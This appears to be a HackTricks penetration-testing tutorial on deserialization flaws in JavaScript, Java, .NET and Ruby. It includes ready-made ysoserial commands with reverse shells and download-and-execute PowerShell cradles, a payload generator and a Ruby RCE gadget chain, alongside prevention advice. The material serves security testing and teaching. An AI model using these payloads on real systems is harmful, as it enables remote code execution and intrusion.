[**serialize-javascript**](https://www.npmjs.com/package/serialize-javascript) The package **doesnโ€™t include any deserialization functionalit**y and requires you to implement it yourself. Their example uses `eval` directly. This is the official deserialisation example: ```javascript function deserialize(serializedJavascript){ return eval('(' + serializedJavascript + ')'); } ``` If this function is used to deserialize objects you can **easily exploit it**: ```javascript var serialize = require('serialize-javascript'); //Serialization var test = serialize(function() { return "Hello world!" }); console.log(test) //function() { return "Hello world!" } //Deserialization var test = "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()" deserialize(test) ``` ## Cryo library In the following pages you can find information about how to abuse this library to execute arbitrary commands: * [https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/) * [https://hackerone.com/reports/350418](https://hackerone.com/reports/350418) # Java - HTTP The main problem with deserialized objects in Java is that **deserialization callbacks were invoked during deserialization**. This makes possible for an **attacker** to **take advantage of that callbacks** and prepare a payload that abuses the callbacks to **perform malicious actions**. ## Fingerprints ### White Box Search inside the code for serialization classes and function. For example, search for classes implementing `Serializable` , the use of `java.io.ObjectInputStream` __ or `readObject` __ or `readUnshare` functions_._ You should also keep an eye on: * `XMLdecoder` with external user defined parameters * `XStream` with `fromXML` method (xstream version <= v1.46 is vulnerable to the serialization issue) * `ObjectInputStream` with `readObject` * Uses of `readObject`, `readObjectNodData`, `readResolve` or `readExternal` * `ObjectInputStream.readUnshared` * `Serializable` ### Black Box **Fingerprints/Magic Bytes** of **java serialised** objects (from `ObjectInputStream`): * `AC ED 00 05` in Hex * `rO0` in Base64 * `Content-type` header of an HTTP response set to `application/x-java-serialized-object` * `1F 8B 08 00` Hex previously compressed * `H4sIA` Base64 previously compressed * Web files with extension `.faces` and `faces.ViewState` parameter. If you find this in a wabapp, take a look to the [**post about Java JSF VewState Deserialization**](java-jsf-viewstate-.faces-deserialization.md). ``` javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s ``` ## Check if vulnerable If you want to **learn about how does a Java Deserialized exploit work** you should take a look to [**Basic Java Deserialization**](basic-java-deserialization-objectinputstream-readobject.md), [**Java DNS Deserialization**](java-dns-deserialization-and-gadgetprobe.md), and [**CommonsCollection1 Payload**](java-transformers-to-rutime-exec-payload.md). ### White Box Test You can check if there is installed any application with known vulnerabilities. ```bash find . -iname "*commons*collection*" grep -R InvokeTransformer . ``` You could try to **check all the libraries** known to be vulnerable and that [**Ysoserial** ](https://github.com/frohoff/ysoserial)can provide an exploit for. Or you could check the libraries indicated on [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).\ You could also use [**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) to search for possible gadget chains that can be exploited.\ When running **gadgetinspector** (after building it) don't care about the tons of warnings/errors that it's going through and let it finish. It will write all the findings under _gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_. Please, notice that **gadgetinspector won't create an exploit and it may indicate false positives**. ### Black Box Test Using the Burp extension [**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md) you can identify **which libraries are available** (and even the versions). With this information it could be **easier to choose a payload** to exploit the vulnerability.\ [**Read this to learn more about GadgetProbe**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**.** \ GadgetProbe is focused on ** `ObjectInputStream` ** deserializations**.** Using Burp extension [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) you can **identify vulnerable libraries** exploitable with ysoserial and **exploit** them.\ [**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) \ Java Deserialization Scanner is focused on **`ObjectInputStream`** deserializations. You can also use [**Freddy**](https://github.com/nccgroup/freddy) to **detect deserializations** vulnerabilities in **Burp**. This plugin will detect **not only `ObjectInputStream`**related vulnerabilities but **also** vulns from **Json** an **Yml** deserialization libraries. In active mode, it will try to confirm them using sleep or DNS payloads.\ [**You can find more information about Freddy here.**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/) **Serialization Test** Not all is about checking if any vulnerable library is used by the server. Sometimes you could be able to **change the data inside the serialized object and bypass some checks** (maybe grant you admin privileges inside a webapp).\ If you find a java serialized object being sent to a web application, **you can use** [**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper) **to print in a more human readable format the serialization object that is sent**. Knowing which data are you sending would be easier to modify it and bypass some checks. ## **Exploit** ### **ysoserial** The most well-known tool to exploit Java deserializations is [**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)). You can also consider using [**ysoseral-modified**](https://github.com/pimps/ysoserial-modified) which will allow you to use complex commands (with pipes for example).\ Note that this tool is **focused** on exploiting **`ObjectInputStream`**.\ I would **start using the "URLDNS"** payload **before a RCE** payload to test if the injection is possible. Anyway, note that maybe the "URLDNS" payload is not working but other RCE payload is. ```bash # PoC to make the application perform a DNS req java -jar ysoserial-master-SNAPSHOT.jar URLDNS http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload # PoC RCE in Windows # Ping java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 5 127.0.0.1' > payload # Time, I noticed the response too longer when this was used java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c timeout 5" > payload # Create File java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c echo pwned> C:\\\\Users\\\\username\\\\pwn" > payload # DNS request java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c nslookup jvikwa34jwgftvoxdz16jhpufllb90.burpcollaborator.net" # HTTP request (+DNS) java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c certutil -urlcache -split -f http://j4ops7g6mi9w30verckjrk26txzqnf.burpcollaborator.net/a a" java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAYwBlADcAMABwAG8AbwB1ADAAaABlAGIAaQAzAHcAegB1AHMAMQB6ADIAYQBvADEAZgA3ADkAdgB5AC4AYgB1AHIAcABjAG8AbABsAGEAYgBvAHIAYQB0AG8AcgAuAG4AZQB0AC8AYQAnACkA" ## In the ast http request was encoded: IEX(New-Object Net.WebClient).downloadString('http://1ce70poou0hebi3wzus1z2ao1f79vy.burpcollaborator.net/a') ## To encode something in Base64 for Windows PS from linux you can use: echo -n "<PAYLOAD>" | iconv --to-code UTF-16LE | base64 -w0 # Reverse Shell ## Encoded: IEX(New-Object Net.WebClient).downloadString('http://192.168.1.4:8989/powercat.ps1') java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4ANAA6ADgAOQA4ADkALwBwAG8AdwBlAHIAYwBhAHQALgBwAHMAMQAnACkA" #PoC RCE in Linux # Ping java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 5 192.168.1.4" > payload # Time ## Using time in bash I didn't notice any difference in the timing of the response # Create file java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "touch /tmp/pwn" > payload # DNS request java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "dig ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net" java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "nslookup ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net" # HTTP request (+DNS) java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "curl ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net" > payload java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "wget ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net" # Reverse shell ## Encoded: bash -i >& /dev/tcp/127.0.0.1/4444 0>&1 java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" | base64 -w0 ## Encoded: export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb3J0IFJIT1NUPSIxMjcuMC4wLjEiO2V4cG9ydCBSUE9SVD0xMjM0NTtweXRob24gLWMgJ2ltcG9ydCBzeXMsc29ja2V0LG9zLHB0eTtzPXNvY2tldC5zb2NrZXQoKTtzLmNvbm5lY3QoKG9zLmdldGVudigiUkhPU1QiKSxpbnQob3MuZ2V0ZW52KCJSUE9SVCIpKSkpO1tvcy5kdXAyKHMuZmlsZW5vKCksZmQpIGZvciBmZCBpbiAoMCwxLDIpXTtwdHkuc3Bhd24oIi9iaW4vc2giKSc=}|{base64,-d}|{bash,-i}" # Base64 encode payload in base64 base64 -w0 payload ``` When creating a payload for **java.lang.Runtime.exec()** you **cannot use special characters** like ">" or "|" to redirect the output of an execution, "$()" to execute commands or even **pass arguments** to a command separated by **spaces** (you can do `echo -n "hello world"` but you can't do `python2 -c 'print "Hello world"'`). In order to encode correctly the payload you could [use this webpage](http://www.jackson-t.ca/runtime-exec-payloads.html). Feel free to use the next script to create **all the possible code execution** payloads for Windows and Linux and then test them on the vulnerable web page: ```python import os import base64 # You may need to update the payloads payloads = ['BeanShell1', 'Clojure', 'CommonsBeanutils1', 'CommonsCollections1', 'CommonsCollections2', 'CommonsCollections3', 'CommonsCollections4', 'CommonsCollections5', 'CommonsCollections6', 'CommonsCollections7', 'Groovy1', 'Hibernate1', 'Hibernate2', 'JBossInterceptors1', 'JRMPClient', 'JSON1', 'JavassistWeld1', 'Jdk7u21', 'MozillaRhino1', 'MozillaRhino2', 'Myfaces1', 'Myfaces2', 'ROME', 'Spring1', 'Spring2', 'Vaadin1', 'Wicket1'] def generate(name, cmd): for payload in payloads: final = cmd.replace('REPLACE', payload) print 'Generating ' + payload + ' for ' + name + '...' command = os.popen('java -jar ysoserial.jar ' + payload + ' "' + final + '"') result = command.read() command.close() encoded = base64.b64encode(result) if encoded != "": open(name + '_intruder.txt', 'a').write(encoded + '\n') generate('Windows', 'ping -n 1 win.REPLACE.server.local') generate('Linux', 'ping -c 1 nix.REPLACE.server.local') ``` ### serialkillerbypassgadgets You can **use** [**https://github.com/pwntester/SerialKillerBypassGadgetCollection**](https://github.com/pwntester/SerialKillerBypassGadgetCollection) **along with ysoserial to create more exploits**. More information about this tool in the **slides of the talk** where the tool was presented: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next\_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next\_slideshow=1) ### marshalsec [**marshalsec** ](https://github.com/mbechler/marshalsec)can be used to generate payloads to exploit different **Json** and **Yml** serialization libraries in Java.\ In order to compile the project I needed to **add** this **dependencies** to `pom.xml`: ```markup <dependency> <groupId>javax.activation</groupId> <artifactId>activation</artifactId> <version>1.1.1</version> </dependency> <dependency> <groupId>com.sun.jndi</groupId> <artifactId>rmiregistry</artifactId> <version>1.2.1</version> <type>pom</type> </dependency> ``` **Install maven**, and **compile** the project: ```bash sudo apt-get install maven mvn clean package -DskipTests ``` ### FastJSON Read more about this Java JSON library: [https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html](https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html) ## Labs * If you want to test some ysoserial payloads you can **run this webapp**: [https://github.com/hvqzao/java-deserialize-webapp](https://github.com/hvqzao/java-deserialize-webapp) * [https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) ## Why Java LOVES sending serialized objects all over the place. For example: * In **HTTP requests** โ€“ Parameters, ViewState, Cookies, you name it. * **RMI** โ€“ The extensively used Java RMI protocol is 100% based on serialization * **RMI over HTTP** โ€“ Many Java thick client web apps use this โ€“ again 100% serialized objects * **JMX** โ€“ Again, relies on serialized objects being shot over the wire * **Custom Protocols** โ€“ Sending an receiving raw Java objects is the norm โ€“ which weโ€™ll see in some of the exploits to come ## Prevention ### Transient objects A class that implements `Serializable` can implement as `transient` any object inside the class that shouldn't be serializable. For example: ```java public class myAccount implements Serializable { private transient double profit; // declared transient private transient double margin; // declared transient ``` ### Avoid Serialization of a class that need to implements Serializable Some of your application objects may be forced to implement `Serializable` due to their hierarchy. To guarantee that your application objects can't be deserialized, a `readObject()` method should be declared (with a `final` modifier) which always throws an exception: ```java private final void readObject(ObjectInputStream in) throws java.io.IOException { throw new java.io.IOException("Cannot be deserialized"); } ``` ### Check deserialized class before deserializing it The `java.io.ObjectInputStream` class is used to deserialize objects. It's possible to harden its behavior by subclassing it. This is the best solution if: * You can change the code that does the deserialization * You know what classes you expect to deserialize The general idea is to override [`ObjectInputStream.html#resolveClass()`](https://docs.oracle.com/javase/7/docs/api/java/io/ObjectInputStream.html#resolveClass\(java.io.ObjectStreamClass\)) in order to restrict which classes are allowed to be deserialized. Because this call happens before a `readObject()` is called, you can be sure that no deserialization activity will occur unless the type is one that you wish to allow. A simple example of this shown here, where the the `LookAheadObjectInputStream` class is guaranteed not to deserialize any other type besides the `Bicycle` class: ```java public class LookAheadObjectInputStream extends ObjectInputStream { public LookAheadObjectInputStream(InputStream inputStream) throws IOException { super(inputStream); } /** * Only deserialize instances of our expected Bicycle class */ @Override protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException { if (!desc.getName().equals(Bicycle.class.getName())) { throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName()); } return super.resolveClass(desc); } } ``` **Harden All java.io.ObjectInputStream Usage with an Agent** If you don't own the code or can't wait for a patch, using an agent to weave in hardening to `java.io.ObjectInputStream` is the best solution.\ Using this approach you can only Blacklist known malicious types and not whitelist them as you don't know which object are being serialized. To enable these agents, simply add a new JVM parameter: ``` -javaagent:name-of-agent.jar ``` Example: [rO0 by Contrast Security](https://github.com/Contrast-Security-OSS/contrast-rO0) ## References * Deserialization and ysoserial talk: [http://frohoff.github.io/appseccali-marshalling-pickles/](http://frohoff.github.io/appseccali-marshalling-pickles/) * [https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/) * [https://www.youtube.com/watch?v=VviY3O-euVQ](https://www.youtube.com/watch?v=VviY3O-euVQ) * Talk about gadgetinspector: [https://www.youtube.com/watch?v=wPbW6zQ52w8](https://www.youtube.com/watch?v=wPbW6zQ52w8) and slides: [https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf](https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf) * Marshalsec paper: [https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true](https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true) * [https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr](https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr) * [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html) * [https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html](https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html) * Java and .Net JSON deserialization **paper:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) * Deserialziations CVEs: [https://paper.seebug.org/123/](https://paper.seebug.org/123/) # JNDI Injection & log4Shell Find whats is **JNDI Injection, how to abuse it via RMI, CORBA & LDAP and how to exploit log4shell** (and example of this vuln) in the following page: {% content-ref url="jndi-java-naming-and-directory-interface-and-log4shell.md" %} [jndi-java-naming-and-directory-interface-and-log4shell.md](jndi-java-naming-and-directory-interface-and-log4shell.md) {% endcontent-ref %} # JMS - Java Message Service > The **Java Message Service** (**JMS**) API is a Java message-oriented middleware API for sending messages between two or more clients. It is an implementation to handle the producerโ€“consumer problem. JMS is a part of the Java Platform, Enterprise Edition (Java EE), and was defined by a specification developed at Sun Microsystems, but which has since been guided by the Java Community Process. It is a messaging standard that allows application components based on Java EE to create, send, receive, and read messages. It allows the communication between different components of a distributed application to be loosely coupled, reliable, and asynchronous. (From [Wikipedia](https://en.wikipedia.org/wiki/Java\_Message\_Service)). ## Products There are several products using this middleware to send messages: ![](<../../.gitbook/assets/image (291).png>) ![](<../../.gitbook/assets/image (292).png>) ## Exploitation So, basically there are a **bunch of services using JMS on a dangerous way**. Therefore, if you have **enough privileges** to send messages to this services (usually you will need valid credentials) you could be able to send **malicious objects serialized that will be deserialized by the consumer/subscriber**.\ This means that in this exploitation all the **clients that are going to use that message will get infected**. You should remember that even if a service is vulnerable (because it's insecurely deserializing user input) you still need to find valid gadgets to exploit the vulnerability. The tool [JMET](https://github.com/matthiaskaiser/jmet) was created to **connect and attack this services sending several malicious objects serialized using known gadgets**. These exploits will work if the service is still vulnerable and if any of the used gadgets is inside the vulnerable application. ## References * JMET talk: [https://www.youtube.com/watch?v=0h8DWiOWGGA](https://www.youtube.com/watch?v=0h8DWiOWGGA) * Slides: [https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf) # .Net .Net is similar to Java regarding how deserialization exploits work: The **exploit** will **abuse gadgets** that **execute** some interesting **code when** an object is **deserialized**. ## Fingerprint ### WhiteBox Search the source code for the following terms: 1. `TypeNameHandling` 2. `JavaScriptTypeResolver` Look for any serializers where the type is set by a user controlled variable. ### BlackBox You can search for the Base64 encoded string **AAEAAAD/////** or any other thing that **may be deserialized** in the back-end and that allows you to control the deserialized type**.** For example, a **JSON** or **XML** containing `TypeObject` or `$type`. ## ysoserial.net In this case you can use the tool [**ysoserial.net**](https://github.com/pwntester/ysoserial.net) in order to **create the deserialization exploits**. Once downloaded the git repository you should **compile the tool** using Visual Studio for example. If you want to learn about **how does ysoserial.net creates it's exploit** you can [**check this page where is explained the ObjectDataProvider gadget + ExpandedWrapper + Json.Net formatter**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md). The main options of **ysoserial.net** are: **`--gadget`**, **`--formatter`**, **`--output` ** and **`--plugin`.** * **`--gadget`** used to indicate the gadget to abuse (indicate the class/function that will be abused during deserialization to execute commands). * **`--formatter`**, used to indicated the method to serialized the exploit (you need to know which library is using the back-end to deserialize the payload and use the same to serialize it) * **`--output` ** used to indicate if you want the exploit in **raw** or **base64** encoded. _Note that **ysoserial.net** will **encode** the payload using **UTF-16LE** (encoding used by default on Windows) so if you get the raw and just encode it from a linux console you might have some **encoding compatibility problems** that will prevent the exploit from working properly (in HTB JSON box the payload worked in both UTF-16LE and ASCII but this doesn't mean it will always work)._ * **`--plugin` ** ysoserial.net supports plugins to craft **exploits for specific frameworks** like ViewState ### More ysoserial.net parameters * `--minify` will provide a **smaller payload** (if possible) * `--raf -f Json.Net -c "anything"` This will indicate all the gadgets that can be used with a provided formatter (`Json.Net` in this case) * `--sf xml` you can **indicate a gadget** (`-g`)and ysoserial.net will search for formatters containing "xml" (case insensitive) **ysoserial examples** to create exploits: ```bash #Send ping ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 10.10.14.44" -o base64 #Timing #I tried using ping and timeout but there wasn't any difference in the response timing from the web server #DNS/HTTP request ysoserial.exe -g ObjectDataProvider -f Json.Net -c "nslookup sb7jkgm6onw1ymw0867mzm2r0i68ux.burpcollaborator.net" -o base64 ysoserial.exe -g ObjectDataProvider -f Json.Net -c "certutil -urlcache -split -f http://rfaqfsze4tl7hhkt5jtp53a1fsli97.burpcollaborator.net/a a" -o base64 #Reverse shell #Create shell command in linux echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.ps1')" | iconv -t UTF-16LE | base64 -w0 #Create exploit using the created B64 shellcode ysoserial.exe -g ObjectDataProvider -f Json.Net -c "powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA=" -o base64 ``` **ysoserial.net** has also a **very interesting parameter** that helps to understand better how every exploit works: `--test`\ If you indicates this parameter **ysoserial.net** will **try** the **exploit locally,** so you can test if your payload will work correctly.\ This parameter is helpful because if you review the code you will find chucks of code like the following one (from [ObjectDataProviderGenerator.cs](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Generators/ObjectDataProviderGenerator.cs#L208)): ```java if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } ``` This means that in order to test the exploit the code will call [serializersHelper.JsonNet\_deserialize](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Helpers/SerializersHelper.cs#L539) ```java public static object JsonNet_deserialize(string str) { Object obj = JsonConvert.DeserializeObject<Object>(str, new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.Auto }); return obj; } ``` In the **previous code is vulnerable to the exploit created**. So if you find something similar in a .Net application it means that probably that application is vulnerable too.\ Therefore the **`--test`** parameter allows us to understand **which chunks of code are vulnerable** to the desrialization exploit that **ysoserial.net** can create. ## ViewState Take a look to [this POST about **how to try to exploit the \_\_ViewState parameter of .Net** ](exploiting-\_\_viewstate-parameter.md)to **execute arbitrary code.** If you **already know the secrets** used by the victim machine, [**read this post to know to execute code**](exploiting-\_\_viewstate-knowing-the-secret.md)**.** ## **Prevention** Don't allow the datastream to define the type of object that the stream will be deserialized to. You can prevent this by for example using the `DataContractSerializer` or `XmlSerializer` if at all possible. Where `JSON.Net` is being used make sure the `TypeNameHandling` is only set to `None`. ``` TypeNameHandling = TypeNameHandling.None ``` If `JavaScriptSerializer` is to be used then do not use it with a `JavaScriptTypeResolver`. If you must deserialise data streams that define their own type, then restrict the types that are allowed to be deserialized. One should be aware that this is still risky as many native .Net types potentially dangerous in themselves. e.g. ``` System.IO.FileInfo ``` `FileInfo` objects that reference files actually on the server can when deserialized, change the properties of those files e.g. to read-only, creating a potential denial of service attack. Even if you have limited the types that can be deserialised remember that some types have properties that are risky. `System.ComponentModel.DataAnnotations.ValidationException`, for example has a property `Value` of type `Object`. if this type is the type allowed for deserialization then an attacker can set the `Value` property to any object type they choose. Attackers should be prevented from steering the type that will be instantiated. If this is possible then even `DataContractSerializer` or `XmlSerializer` can be subverted e.g. ``` // Action below is dangerous if the attacker can change the data in the database var typename = GetTransactionTypeFromDatabase(); var serializer = new DataContractJsonSerializer(Type.GetType(typename)); var obj = serializer.ReadObject(ms); ``` Execution can occur within certain .Net types during deserialization. Creating a control such as the one shown below is ineffective. ``` var suspectObject = myBinaryFormatter.Deserialize(untrustedData); //Check below is too late! Execution may have already occurred. if (suspectObject is SomeDangerousObjectType) { //generate warnings and dispose of suspectObject } ``` For `BinaryFormatter` and `JSON.Net` it is possible to create a safer form of white list control using a custom `SerializationBinder`. Try to keep up-to-date on known .Net insecure deserialization gadgets and pay special attention where such types can be created by your deserialization processes. **A deserializer can only instantiate types that it knows about**. Try to keep any code that might create potential gadgets separate from any code that has internet connectivity. As an example `System.Windows.Data.ObjectDataProvider` used in WPF applications is a known gadget that allows arbitrary method invocation. It would be risky to have this a reference to this assembly in a REST service project that deserializes untrusted data. ## **References** * Java and .Net JSON deserialization **paper:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) * [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html#net-csharp](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html#net-csharp) * [https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH\_US\_12\_Forshaw\_Are\_You\_My\_Type\_WP.pdf](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH\_US\_12\_Forshaw\_Are\_You\_My\_Type\_WP.pdf) * [https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization](https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization) # **Ruby** Ruby has two methods to implement serialization inside the **marshal** library: first method is **dump** that converts object into bytes streams **(serialize)**. And the second method is **load** to convert bytes stream to object again (**deserialize**).\ Ruby uses HMAC to sign the serialized object and saves the key on one of the following files: * config/environment.rb * config/initializers/secret\_token.rb * config/secrets.yml * /proc/self/environ Ruby 2.X generic deserialization to RCE gadget chain (more info in [https://www.elttam.com/blog/ruby-deserialization/](https://www.elttam.com/blog/ruby-deserialization/)): ```ruby #!/usr/bin/env ruby class Gem::StubSpecification def initialize; end end stub_specification = Gem::StubSpecification.new stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")#RCE cmd must start with "|" and end with "1>&2" puts "STEP n" stub_specification.name rescue nil puts class Gem::Source::SpecificFile def initialize; end end specific_file = Gem::Source::SpecificFile.new specific_file.instance_variable_set(:@spec, stub_specification) other_specific_file = Gem::Source::SpecificFile.new puts "STEP n-1" specific_file <=> other_specific_file rescue nil puts $dependency_list= Gem::DependencyList.new $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file]) puts "STEP n-2" $dependency_list.each{} rescue nil puts class Gem::Requirement def marshal_dump [$dependency_list] end end payload = Marshal.dump(Gem::Requirement.new) puts "STEP n-3" Marshal.load(payload) rescue nil puts puts "VALIDATION (in fresh ruby process):" IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe| pipe.print payload pipe.close_write puts pipe.gets puts end puts "Payload (hex):" puts payload.unpack('H*')[0] puts require "base64" puts "Payload (Base64 encoded):" puts Base64.encode64(payload) ``` Other RCE chain to exploit Ruby On Rails: [https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/](https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/) <details> <summary><strong>Support HackTricks and get benefits!</strong></summary> Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Join the** [**๐Ÿ’ฌ**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**๐Ÿฆ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** </details>
